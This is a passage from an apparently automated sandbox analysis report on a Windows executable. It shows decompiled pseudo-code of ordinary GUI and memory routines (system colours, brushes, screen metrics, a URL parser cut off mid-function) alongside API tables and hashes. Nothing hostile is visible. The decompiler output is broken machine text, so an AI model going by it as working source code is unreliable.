				 *((intOrPtr*)(_t286 + 0x188)) = _t120;
				E00CB90E5(0, _t239, _t284, _t286, 0xffffff, _t316);
				_v4 = 0;
				 *((intOrPtr*)(_t286 + 0x1ac)) = GetDeviceCaps(_v72.tmDigitizedAspectX, 0xc);
				_t123 = GetSysColor(0xf);
				 *(_t286 + 0x1c) = _t123;
				 *(_t286 + 0x54) = _t123;
				_t124 = GetSysColor(0x10);
				 *(_t286 + 0x20) = _t124;
				 *(_t286 + 0x58) = _t124;
				_t125 = GetSysColor(0x15);
				 *(_t286 + 0x30) = _t125;
				 *(_t286 + 0x60) = _t125;
				_t126 = GetSysColor(0x16);
				 *(_t286 + 0x34) = _t126;
				 *(_t286 + 0x64) = _t126;
				_t127 = GetSysColor(0x14);
				 *(_t286 + 0x24) = _t127;
				 *(_t286 + 0x5c) = _t127;
				_t128 = GetSysColor(0x12);
				 *(_t286 + 0x28) = _t128;
				 *(_t286 + 0x68) = _t128;
				 *((intOrPtr*)(_t286 + 0x38)) = GetSysColor(0x11);
				 *((intOrPtr*)(_t286 + 0x2c)) = GetSysColor(6);
				 *(_t286 + 0x3c) = GetSysColor(0xd);
				 *((intOrPtr*)(_t286 + 0x40)) = GetSysColor(0xe);
				_t133 = GetSysColor(5);
				 *(_t286 + 0x6c) = _t133;
				 *(_t286 + 0x50) = _t133;
				 *(_t286 + 0x70) = GetSysColor(8);
				 *((intOrPtr*)(_t286 + 0x74)) = GetSysColor(9);
				 *((intOrPtr*)(_t286 + 0x78)) = GetSysColor(7);
				 *(_t286 + 0x7c) = GetSysColor(2);
				 *(_t286 + 0x80) = GetSysColor(3);
				 *((intOrPtr*)(_t286 + 0x88)) = GetSysColor(0x1b);
				 *((intOrPtr*)(_t286 + 0x8c)) = GetSysColor(0x1c);
				 *((intOrPtr*)(_t286 + 0x90)) = GetSysColor(0xa);
				 *((intOrPtr*)(_t286 + 0x94)) = GetSysColor(0xb);
				 *((intOrPtr*)(_t286 + 0x84)) = GetSysColor(0x13);
				if( *((intOrPtr*)(_t286 + 0x184)) == 0) {
					_t290 = 0x800080;
					_t236 = 0xff0000;
					_t144 = GetSysColor(0x1a);
				} else {
					_t290 =  *(_t286 + 0x70);
					_t236 = _t290;
					_t144 = _t290;
				}
				 *(_t286 + 0x44) = _t144;
				 *(_t286 + 0x48) = _t236;
				 *(_t286 + 0x4c) = _t290;
				_t145 = GetSysColorBrush(0x10);
				 *(_t286 + 0x14) = _t145;
				if(_t145 == 0) {
					L22:
					E00CAA4E7(_t236, _t239, _t286, _t290, __eflags);
					asm("int3");
					E00DDD55F(0xe0a55b, _t236, _t286, _t290);
					_t291 = _t239;
					E00CB90E5(_t236,  &_v92, _t284, _t286, _t291, __eflags, 0, 0x50);
					_v4 = _v4 & 0x00000000;
					_t151 = E00CBA2B8( &_v92, _t291 + 0x11c);
					_t287 = _t151;
					__eflags = _t151;
					if(__eflags == 0) {
						_t152 = E00CAA4E7(_t236,  &_v92, _t287, _t291, __eflags);
						asm("int3");
						_t325 = _v4;
						asm("fcom st0, st1");
						asm("fnstsw ax");
						st1 = _t325;
						__eflags = _t152 & 0x00000041;
						if((_t152 & 0x00000041) != 0) {
							st0 = _t325;
							goto L29;
						} else {
							asm("fcomp qword [0xe19bf8]");
							asm("fnstsw ax");
							__eflags = _t152 & 0x00000041;
							if((_t152 & 0x00000041) != 0) {
								L29:
								asm("fldz");
								return _t152;
							} else {
								asm("fld1");
								return _t152;
							}
						}
					} else {
						GetTextMetricsA(_v84,  &_v72);
						_t155 = _v72.tmHeight;
						__eflags = _t155 - 0xf;
						_t246 = ((0 | _t155 - 0x0000000f >= 0x00000000) - 0x00000001 & 0xfffffffd) + 5;
						 *((intOrPtr*)(_t291 + 0x1cc)) = _t155 + _t246;
						 *((intOrPtr*)(_t291 + 0x1d4)) = _v72.tmMaxCharWidth + _t246;
						E00CBA2B8( &_v92, _t291 + 0x14c);
						GetTextMetricsA(_v84,  &_v72);
						_t163 = _v72.tmHeight;
						__eflags = _t163 - 0xf;
						_t252 = ((0 | _t163 - 0x0000000f >= 0x00000000) - 0x00000001 & 0xfffffffd) + 5;
						 *((intOrPtr*)(_t291 + 0x1d0)) = _t163 + _t252;
						_t166 = _v72.tmMaxCharWidth + _t252;
						__eflags = _t166;
						 *(_t291 + 0x1d8) = _t166;
						E00CBA2B8( &_v92, _t287);
						E00CB9360( &_v92);
						return E00DDD50E(_t236, _t287, _t291);
					}
				} else {
					_t170 = GetSysColorBrush(0x14);
					 *(_t286 + 0x10) = _t170;
					if(_t170 == 0) {
						goto L22;
					} else {
						_t171 = GetSysColorBrush(5);
						 *(_t286 + 0x18) = _t171;
						if(_t171 == 0) {
							goto L22;
						} else {
							E00CB9CCD(_t286 + 0x98);
							_t173 = CreateSolidBrush( *(_t286 + 0x1c)); // executed
							E00CB9BC6(_t236, _t286 + 0x98, _t286, _t173);
							E00CB9CCD(_t286 + 0xd0);
							E00CB9BC6(_t236, _t286 + 0xd0, _t286, CreateSolidBrush( *(_t286 + 0x54)));
							E00CB9CCD(_t286 + 0xb8);
							E00CB9BC6(_t236, _t286 + 0xb8, _t286, CreateSolidBrush( *(_t286 + 0x7c)));
							E00CB9CCD(_t286 + 0xc0);
							E00CB9BC6(_t236, _t286 + 0xc0, _t286, CreateSolidBrush( *(_t286 + 0x80)));
							E00CB9CCD(_t286 + 0xa0);
							E00CB9BC6(_t236, _t286 + 0xa0, _t286, CreateSolidBrush( *(_t286 + 0x3c)));
							E00CB9CCD(_t286 + 0xb0);
							E00CB9BC6(_t236, _t286 + 0xb0, _t286, CreateSolidBrush( *(_t286 + 0x30)));
							E00CB9CCD(_t286 + 0xc8);
							E00CB9BC6(_t236, _t286 + 0xc8, _t286, CreateSolidBrush( *(_t286 + 0x6c)));
							E00CB9CCD(_t286 + 0xd8);
							_t194 = CreatePen(0, 1,  *0xe8711c); // executed
							E00CB9BC6(0, _t286 + 0xd8, _t286, _t194);
							E00CB9CCD(_t286 + 0xe0);
							E00CB9BC6(0, _t286 + 0xe0, _t286, CreatePen(0, 1,  *0xe87134));
							_t290 = _t286 + 0xe8;
							E00CB9CCD(_t286 + 0xe8);
							E00CB9BC6(0, _t286 + 0xe8, _t286, CreatePen(0, 1,  *0xe87138));
							_t236 = _t286 + 0xa8;
							if(_t236 != 0 &&  *((intOrPtr*)(_t236 + 4)) != 0) {
								E00CB9CCD(_t236);
							}
							if( *((intOrPtr*)(_t286 + 0x1ac)) <= 8) {
								_t239 = _t286;
								__eflags = E00CD89BC(_v72.tmOverhang);
								if(__eflags == 0) {
									goto L22;
								} else {
									_t76 =  &(_v72.tmCharSet);
									 *_t76 = _v72.tmCharSet & 0x00000000;
									__eflags =  *_t76;
									_v72.tmItalic = 0xe196b4;
									_v4 = 1;
									E00CB9BC6(_t236,  &(_v72.tmItalic), _t286, _t202);
									E00CB9BC6(_t236, _t236, _t286, CreatePatternBrush(_v72.tmCharSet));
									_v4 = 0;
									_v72.tmItalic = 0xe196b4;
									E00CB91F0( &(_v72.tmItalic), _t284);
									goto L21;
								}
							} else {
								_v13 =  *(_t286 + 0x1c);
								asm("cdq");
								asm("cdq");
								asm("cdq");
								E00CB9BC6(_t236, _t286 + 0xa8, _t286, CreateSolidBrush((((( *(_t286 + 0x26) & 0x000000ff) - ( *(_t286 + 0x1e) & 0x000000ff) - _t284 >> 0x00000001) +  *(_t286 + 0x1e) & 0x000000ff) << 0x00000008 | (( *(_t286 + 0x25) & 0x000000ff) - ( *(_t286 + 0x1d) & 0x000000ff) - _t284 >> 0x00000001) +  *(_t286 + 0x1d) & 0x000000ff) << 0x00000008 | (( *(_t286 + 0x24) & 0x000000ff) - (_v13 & 0x000000ff) - _t284 >> 0x00000001) + _v13 & 0x000000ff));
								L21:
								E00D09DA8();
								 *0xe8871c = 1;
								return E00DDD4FA(E00CB9360( &(_v72.tmWeight)));
							}
						}
					}
				}
			}

0x00cd96dd
0x00cd96dd
0x00cd96e4
0x00cd96e9
0x00cd96fc
0x00cd970d
0x00cd970d
0x00cd96fe
0x00cd9700
0x00cd9708
0x00000000
0x00cd970a
0x00cd970a
0x00cd970a
0x00cd9708
0x00cd9711
0x00cd971f
0x00cd9732
0x00cd9732
0x00cd9721
0x00cd9723
0x00cd9729
0x00cd972b
0x00000000
0x00cd972d
0x00cd972f
0x00cd972f
0x00cd972b
0x00cd9734
0x00cd9735
0x00cd9738
0x00cd973e
0x00cd9748
0x00cd9753
0x00cd9759
0x00cd9761
0x00cd9764
0x00cd9767
0x00cd976f
0x00cd9772
0x00cd9775
0x00cd977d
0x00cd9780
0x00cd9783
0x00cd978b
0x00cd978e
0x00cd9791
0x00cd9799
0x00cd979c
0x00cd979f
0x00cd97a7
0x00cd97aa
0x00cd97b5
0x00cd97c0
0x00cd97cb
0x00cd97d6
0x00cd97d9
0x00cd97e1
0x00cd97e4
0x00cd97ef
0x00cd97fa
0x00cd9805
0x00cd9810
0x00cd981b
0x00cd9829
0x00cd9837
0x00cd9845
0x00cd9853
0x00cd9865
0x00cd986b
0x00cd9878
0x00cd987d
0x00cd9882
0x00cd986d
0x00cd986d
0x00cd9870
0x00cd9872
0x00cd9872
0x00cd9888
0x00cd988b
0x00cd9890
0x00cd9893
0x00cd9899
0x00cd989e
0x00cd9af5
0x00cd9af5
0x00cd9afa
0x00cd9b02
0x00cd9b07
0x00cd9b0e
0x00cd9b13
0x00cd9b21
0x00cd9b26
0x00cd9b28
0x00cd9b2a
0x00cd9bba
0x00cd9bbf
0x00cd9bc9
0x00cd9bcc
0x00cd9bce
0x00cd9bd0
0x00cd9bd2
0x00cd9bd5
0x00cd9be8
0x00000000
0x00cd9bd7
0x00cd9bd7
0x00cd9bdd
0x00cd9bdf
0x00cd9be2
0x00cd9bea
0x00cd9bea
0x00cd9bed
0x00cd9be4
0x00cd9be4
0x00cd9be7
0x00cd9be7
0x00cd9be2
0x00cd9b30
0x00cd9b37
0x00cd9b3d
0x00cd9b42
0x00cd9b4c
0x00cd9b51
0x00cd9b5f
0x00cd9b6c
0x00cd9b78
0x00cd9b7e
0x00cd9b83
0x00cd9b8e
0x00cd9b93
0x00cd9b9c
0x00cd9b9c
0x00cd9ba1
0x00cd9ba7
0x00cd9baf
0x00cd9bb9
0x00cd9bb9
0x00cd98a4
0x00cd98a6
0x00cd98ac
0x00cd98b1
0x00000000
0x00cd98b7
0x00cd98b9
0x00cd98bf
0x00cd98c4
0x00000000
0x00cd98ca
0x00cd98d2
0x00cd98da
0x00cd98e3
0x00cd98f0
0x00cd9901
0x00cd990e
0x00cd991f
0x00cd992c
0x00cd9940
0x00cd994d
0x00cd995e
0x00cd996b
0x00cd997c
0x00cd9989
0x00cd999a
0x00cd99a7
0x00cd99b7
0x00cd99c0
0x00cd99cd
0x00cd99e4
0x00cd99e9
0x00cd99f1
0x00cd9a08
0x00cd9a0d
0x00cd9a15
0x00cd9a1f
0x00cd9a1f
0x00cd9a2b
0x00cd9a94
0x00cd9a9b
0x00cd9a9d
0x00000000
0x00cd9a9f
0x00cd9a9f
0x00cd9a9f
0x00cd9a9f
0x00cd9aa8
0x00cd9aaf
0x00cd9ab3
0x00cd9ac4
0x00cd9acc
0x00cd9ad0
0x00cd9ad3
0x00000000
0x00cd9ad3
0x00cd9a2d
0x00cd9a34
0x00cd9a41
0x00cd9a59
0x00cd9a6f
0x00cd9a8a
0x00cd9ad8
0x00cd9ad8
0x00cd9ae0
0x00cd9af4
0x00cd9af4
0x00cd9a2b
0x00cd98c4
0x00cd98b1

APIs

__EH_prolog3.LIBCMT ref: 00CD96E4
GetSysColor.USER32(00000016), ref: 00CD96ED
GetSysColor.USER32(0000000F), ref: 00CD9700
GetSysColor.USER32(00000015), ref: 00CD9717
GetSysColor.USER32(0000000F), ref: 00CD9723
GetDeviceCaps.GDI32(?,0000000C), ref: 00CD974B
GetSysColor.USER32(0000000F), ref: 00CD9759
GetSysColor.USER32(00000010), ref: 00CD9767
GetSysColor.USER32(00000015), ref: 00CD9775
GetSysColor.USER32(00000016), ref: 00CD9783
GetSysColor.USER32(00000014), ref: 00CD9791
GetSysColor.USER32(00000012), ref: 00CD979F
GetSysColor.USER32(00000011), ref: 00CD97AD
GetSysColor.USER32(00000006), ref: 00CD97B8
GetSysColor.USER32(0000000D), ref: 00CD97C3
GetSysColor.USER32(0000000E), ref: 00CD97CE
GetSysColor.USER32(00000005), ref: 00CD97D9
GetSysColor.USER32(00000008), ref: 00CD97E7
GetSysColor.USER32(00000009), ref: 00CD97F2
GetSysColor.USER32(00000007), ref: 00CD97FD
GetSysColor.USER32(00000002), ref: 00CD9808
GetSysColor.USER32(00000003), ref: 00CD9813
GetSysColor.USER32(0000001B), ref: 00CD9821
GetSysColor.USER32(0000001C), ref: 00CD982F
GetSysColor.USER32(0000000A), ref: 00CD983D
GetSysColor.USER32(0000000B), ref: 00CD984B
GetSysColor.USER32(00000013), ref: 00CD9859
GetSysColor.USER32(0000001A), ref: 00CD9882
GetSysColorBrush.USER32(00000010), ref: 00CD9893
GetSysColorBrush.USER32(00000014), ref: 00CD98A6
GetSysColorBrush.USER32(00000005), ref: 00CD98B9
CreateSolidBrush.GDI32(?), ref: 00CD98DA
CreateSolidBrush.GDI32(?), ref: 00CD98F8
CreateSolidBrush.GDI32(?), ref: 00CD9916
CreateSolidBrush.GDI32(?), ref: 00CD9937
CreateSolidBrush.GDI32(?), ref: 00CD9955
CreateSolidBrush.GDI32(?), ref: 00CD9973
CreateSolidBrush.GDI32(?), ref: 00CD9991
CreatePen.GDI32(00000000,00000001,00000000), ref: 00CD99B7
CreatePen.GDI32(00000000,00000001,00000000), ref: 00CD99DB
CreatePen.GDI32(00000000,00000001,00000000), ref: 00CD99FF
CreateSolidBrush.GDI32(?), ref: 00CD9A7D
CreatePatternBrush.GDI32(00000000), ref: 00CD9ABB

Part of subcall function 00CB9CCD: DeleteObject.GDI32(00000000), ref: 00CB9CDC

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Color$BrushCreate$Solid$CapsDeleteDeviceH_prolog3ObjectPattern
String ID:
API String ID: 3754413814-0
Opcode ID: 4669c4ba9fdc8cdfc3de773f558c92a4b5867f9bfcf48042b0fa3a8218df7249
Instruction ID: a5651466817be309e5dc973e2b0b0210d4ffeb499232d98b72d217f611b1b796
Opcode Fuzzy Hash: 4669c4ba9fdc8cdfc3de773f558c92a4b5867f9bfcf48042b0fa3a8218df7249
Instruction Fuzzy Hash: A6C1AE71B04652AFCB09AFB59C49BECBFB0FF04B00F008529E656A7291CB34A515DBE0

Uniqueness

Uniqueness Score: -1.00%

Function 00CAD917 Relevance: 15.1, APIs: 10, Instructions: 109
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 76%

			E00CAD917(void* __ecx) {
				signed int _v8;
				void** _v12;
				struct _CRITICAL_SECTION* _v16;
				intOrPtr _v20;
				struct _CRITICAL_SECTION* _v32;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t63;
				void* _t64;
				intOrPtr _t65;
				intOrPtr _t67;
				void* _t73;
				long _t81;
				signed char* _t83;
				void* _t85;
				intOrPtr _t86;
				signed int _t87;
				void** _t89;
				void* _t90;
				intOrPtr _t92;
				signed int _t93;
				intOrPtr _t99;
				signed int _t100;
				signed int _t101;
				signed int _t103;
				struct _CRITICAL_SECTION* _t104;
				void** _t105;
				void* _t106;
				struct _CRITICAL_SECTION* _t107;
				void* _t109;

				_t85 = __ecx;
				_t1 = _t85 + 0x1c; // 0xe85280
				_t104 = _t1;
				_v16 = _t104;
				EnterCriticalSection(_t104);
				_t3 = _t85 + 4; // 0x20
				_t99 =  *_t3;
				_t4 = _t85 + 0x10; // 0xe85274
				_t89 = _t4;
				_t5 = _t85 + 8; // 0x3
				_t101 =  *_t5;
				if(_t101 >= _t99 || ( *( *_t89 + _t101 * 8) & 0x00000001) != 0) {
					_t101 = 1;
					if(_t99 <= 1) {
						L7:
						_t12 = _t85 + 0x10; // 0xe85274
						_t105 = _t12;
						_t90 =  *_t105;
						_t13 = _t99 + 0x20; // 0x40
						_t60 = _t13;
						_v8 = _t13;
						_v12 = _t105;
						if(_t90 != 0) {
							_t106 = GlobalHandle(_t90);
							GlobalUnlock(_t106);
							_t63 = E00CAA848(_t85, _t101, _t106, _v8, 8);
							_t92 = 0x2002;
							_t64 = GlobalReAlloc(_t106, _t63, ??);
							_t105 = _v12;
						} else {
							_t81 = E00CAA848(_t85, _t101, _t105, _t60, 8);
							_pop(_t92);
							_t64 = GlobalAlloc(2, _t81); // executed
						}
						if(_t64 == 0) {
							__eflags =  *_t105;
							if(__eflags != 0) {
								GlobalLock(GlobalHandle( *_t105));
							}
							LeaveCriticalSection(_v16);
							_t65 = E00CAA501(_t85, _t92, _t101, _t105, __eflags);
							asm("int3");
							_push(_t85);
							_t86 = _t92;
							_push(_t105);
							_push(_t101);
							_v36 = _t86;
							_t107 = _t86 + 0x1c;
							_v32 = _t107;
							EnterCriticalSection(_t107);
							_t103 = _v16;
							__eflags = _t103;
							if(_t103 > 0) {
								__eflags = _t103 -  *((intOrPtr*)(_t86 + 0xc));
								if(_t103 <  *((intOrPtr*)(_t86 + 0xc))) {
									_t87 =  *(_t86 + 0x14);
									__eflags = _t87;
									if(_t87 != 0) {
										do {
											__eflags = _t103 -  *((intOrPtr*)(_t87 + 8));
											if(_t103 <  *((intOrPtr*)(_t87 + 8))) {
												_t67 =  *((intOrPtr*)(_t87 + 0xc));
												_t93 =  *(_t67 + _t103 * 4);
												_v12 = _t93;
												__eflags = _t93;
												if(_t93 != 0) {
													 *0xe17a64(1);
													 *((intOrPtr*)( *((intOrPtr*)( *_t93))))();
													_t67 =  *((intOrPtr*)(_t87 + 0xc));
												}
												_t48 = _t67 + _t103 * 4;
												 *_t48 =  *(_t67 + _t103 * 4) & 0x00000000;
												__eflags =  *_t48;
											}
											_t87 =  *(_t87 + 4);
											__eflags = _t87;
										} while (_t87 != 0);
										_t107 = _v16;
									}
									_t65 =  *((intOrPtr*)(_v20 + 0x10));
									_t56 = _t65 + _t103 * 8;
									 *_t56 =  *(_t65 + _t103 * 8) & 0xfffffffe;
									__eflags =  *_t56;
								}
							}
							LeaveCriticalSection(_t107);
							return _t65;
						} else {
							_t73 = GlobalLock(_t64);
							_t18 = _t85 + 4; // 0x20
							_t109 = _t73;
							E00DDFBE0(_t101, _t109 +  *_t18 * 8, 0, _v8 -  *_t18 << 3);
							_t89 = _v12;
							 *(_t85 + 4) = _v8;
							 *_t89 = _t109;
							_t25 = _t85 + 0x1c; // 0xe85280
							_t104 = _t25;
							goto L12;
						}
					} else {
						_t83 =  *_t89 + 8;
						while(( *_t83 & 0x00000001) != 0) {
							_t101 = _t101 + 1;
							_t83 =  &(_t83[8]);
							if(_t101 < _t99) {
								continue;
							}
							break;
						}
						if(_t101 < _t99) {
							goto L12;
						} else {
							goto L7;
						}
					}
				} else {
					L12:
					_t26 = _t101 + 1; // 0x2
					_t100 = _t26;
					_t27 = _t85 + 0xc; // 0x3
					if(_t101 >=  *_t27) {
						 *(_t85 + 0xc) = _t100;
					}
					 *( *_t89 + _t101 * 8) =  *( *_t89 + _t101 * 8) | 0x00000001;
					 *(_t85 + 8) = _t100;
					LeaveCriticalSection(_t104);
					return _t101;
				}
			}

0x00cad91e
0x00cad922
0x00cad922
0x00cad926
0x00cad929
0x00cad92f
0x00cad92f
0x00cad932
0x00cad932
0x00cad935
0x00cad935
0x00cad93a
0x00cad94a
0x00cad94d
0x00cad969
0x00cad969
0x00cad969
0x00cad96c
0x00cad96e
0x00cad96e
0x00cad971
0x00cad974
0x00cad979
0x00cad997
0x00cad99a
0x00cad9aa
0x00cad9b0
0x00cad9b3
0x00cad9b9
0x00cad97b
0x00cad97e
0x00cad984
0x00cad988
0x00cad988
0x00cad9be
0x00cada13
0x00cada16
0x00cada21
0x00cada21
0x00cada2a
0x00cada30
0x00cada35
0x00cada3c
0x00cada3d
0x00cada3f
0x00cada40
0x00cada41
0x00cada44
0x00cada48
0x00cada4b
0x00cada51
0x00cada54
0x00cada56
0x00cada58
0x00cada5b
0x00cada5d
0x00cada60
0x00cada62
0x00cada64
0x00cada64
0x00cada67
0x00cada69
0x00cada6c
0x00cada6f
0x00cada72
0x00cada74
0x00cada7e
0x00cada87
0x00cada89
0x00cada89
0x00cada8c
0x00cada8c
0x00cada8c
0x00cada8c
0x00cada90
0x00cada93
0x00cada93
0x00cada97
0x00cada97
0x00cada9d
0x00cadaa0
0x00cadaa0
0x00cadaa0
0x00cadaa0
0x00cada5b
0x00cadaa5
0x00cadaaf
0x00cad9c0
0x00cad9c1
0x00cad9c7
0x00cad9ca
0x00cad9db
0x00cad9e0
0x00cad9e9
0x00cad9ec
0x00cad9ee
0x00cad9ee
0x00000000
0x00cad9ee
0x00cad94f
0x00cad951
0x00cad954
0x00cad959
0x00cad95a
0x00cad95f
0x00000000
0x00000000
0x00000000
0x00cad95f
0x00cad963
0x00000000
0x00000000
0x00000000
0x00000000
0x00cad963
0x00cad9f1
0x00cad9f1
0x00cad9f1
0x00cad9f1
0x00cad9f4
0x00cad9f7
0x00cad9f9
0x00cad9f9
0x00cad9ff
0x00cada03
0x00cada06
0x00cada12
0x00cada12

APIs

EnterCriticalSection.KERNEL32(00E85280,?,?,00000001,00000004), ref: 00CAD929
GlobalAlloc.KERNEL32(00000002,00000000,?,?,00000001,00000004), ref: 00CAD988
GlobalHandle.KERNEL32(00E85274), ref: 00CAD991
GlobalUnlock.KERNEL32(00000000,?,?,00000001,00000004), ref: 00CAD99A
GlobalReAlloc.KERNEL32 ref: 00CAD9B3
GlobalLock.KERNEL32 ref: 00CAD9C1
LeaveCriticalSection.KERNEL32(00E85280,?,?,00000001,00000004), ref: 00CADA06
GlobalHandle.KERNEL32(00000000), ref: 00CADA1A
GlobalLock.KERNEL32 ref: 00CADA21
LeaveCriticalSection.KERNEL32(00000004,?,?,00000001,00000004), ref: 00CADA2A

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
String ID:
API String ID: 2667261700-0
Opcode ID: 97148a43f5e4aeac17e0777a8296b2ca750bd4188cb0cac9555aa1999204e8c6
Instruction ID: 9b3be4360e5fff0c1701796102bd668da8fda5ede0695b8ed883b6b3a80c140b
Opcode Fuzzy Hash: 97148a43f5e4aeac17e0777a8296b2ca750bd4188cb0cac9555aa1999204e8c6
Instruction Fuzzy Hash: 2831C071604202AFCB149F69DC89AAA7BB8FF45704F1480A9EC56EB251DB30EE45DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00CAD7A6 Relevance: 12.0, APIs: 8, Instructions: 34
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00CAD7A6(void* __ecx) {
				int _t5;
				void* _t16;
				struct HDC__* _t17;

				_t16 = __ecx; // executed
				_t5 = GetSystemMetrics(0xb); // executed
				 *((intOrPtr*)(_t16 + 8)) = _t5;
				 *((intOrPtr*)(_t16 + 0xc)) = GetSystemMetrics(0xc);
				 *0xe85210 = GetSystemMetrics(2) + 1;
				 *0xe85214 = GetSystemMetrics(3) + 1;
				_t17 = GetDC(0);
				 *((intOrPtr*)(_t16 + 0x18)) = GetDeviceCaps(_t17, 0x58);
				 *((intOrPtr*)(_t16 + 0x1c)) = GetDeviceCaps(_t17, 0x5a);
				return ReleaseDC(0, _t17);
			}

0x00cad7aa
0x00cad7ac
0x00cad7b4
0x00cad7bf
0x00cad7cb
0x00cad7d9
0x00cad7e4
0x00cad7f2
0x00cad7fe
0x00cad809

APIs

KiUserCallbackDispatcher.NTDLL ref: 00CAD7AC
GetSystemMetrics.USER32 ref: 00CAD7B7
GetSystemMetrics.USER32 ref: 00CAD7C2
GetSystemMetrics.USER32 ref: 00CAD7D0
GetDC.USER32(00000000), ref: 00CAD7DE
GetDeviceCaps.GDI32(00000000,00000058), ref: 00CAD7E9
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CAD7F5
ReleaseDC.USER32 ref: 00CAD801

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: MetricsSystem$CapsDevice$CallbackDispatcherReleaseUser
String ID:
API String ID: 1031845853-0
Opcode ID: f192630a637f6da9452aac15d0b8b393426d9affa368051688a48065c8a8ec77
Instruction ID: c7ec03f42af9faf1f8e747031733477c6af1db3b80883123e39174ac6ba7e9fd
Opcode Fuzzy Hash: f192630a637f6da9452aac15d0b8b393426d9affa368051688a48065c8a8ec77
Instruction Fuzzy Hash: ABF04972A94B10AFE3001F72AC0DB9A3B70FB00B12F00C615F286EA1A0CBB48409CFC0

Uniqueness

Uniqueness Score: -1.00%

Function 00CAB0EA Relevance: 10.7, APIs: 7, Instructions: 153
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E00CAB0EA(char* _a4, struct _SYSTEMTIME _a8, intOrPtr* _a12, long _a16, signed int _a20) {
				signed int _v8;
				char _v2092;
				long _v2096;
				long _v2100;
				char* _v2104;
				long _v2108;
				char* _v2112;
				long _v2116;
				long _v2120;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t47;
				char* _t50;
				int _t56;
				char* _t59;
				char* _t60;
				char* _t61;
				char* _t62;
				char* _t63;
				char* _t64;
				char* _t68;
				intOrPtr _t70;
				void* _t71;
				long _t72;
				char* _t76;
				char* _t77;
				char* _t80;
				struct _SYSTEMTIME _t88;
				intOrPtr* _t89;
				signed int _t90;

				_t47 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t47 ^ _t90;
				_t77 = _a4;
				_t89 = _a12;
				_t88 = _a8;
				_v2104 = _t77;
				_v2120 = _a16;
				if(_t88 == 0 || _t77 == 0) {
					L27:
					_t50 = 0;
					goto L28;
				} else {
					_t86 = _a20 & 0x2e000000;
					_v2096 = 0x824;
					_v2100 = 0;
					_v2116 = _t86;
					_v2108 = 0;
					_v2112 = 0;
					if((_a20 & 0x90000000) != 0 &&  *((intOrPtr*)(_t88 + 0x30)) != 0) {
						if((_a20 & 0x02000000) == 0) {
							_v2108 = 0x80000000;
						} else {
							_v2112 = 1;
						}
					}
					if(InternetCanonicalizeUrlA(_t77,  &_v2092,  &_v2096, _t86) != 0) {
						_t76 =  &_v2092;
						goto L13;
					} else {
						_t72 = GetLastError();
						_t97 = _t72 - 0x7a;
						if(_t72 != 0x7a) {
							goto L27;
						}
						_push(_v2096);
						_t76 = E00CA95C0(_t97);
						if(_t76 == 0) {
							goto L27;
						}
						_v2100 = 1;
						if(InternetCanonicalizeUrlA(_v2104, _t76,  &_v2096, _v2116) != 0) {
							L13:
							_t56 = InternetCrackUrlA(_t76, 0, _v2108, _t88); // executed
							__eflags = _v2112;
							_v2104 = _t56;
							if(_v2112 == 0) {
								L21:
								__eflags = _v2100;
								if(_v2100 != 0) {
									L00CA95BB(_t76);
								}
								_t80 = _v2104;
								__eflags = _t80;
								if(_t80 != 0) {
									_t86 = _v2120;
									 *_v2120 =  *((intOrPtr*)(_t88 + 0x18));
									_t59 =  *((intOrPtr*)(_t88 + 0xc)) - 1;
									__eflags = _t59;
									if(_t59 == 0) {
										 *_t89 = 1;
										goto L43;
									}
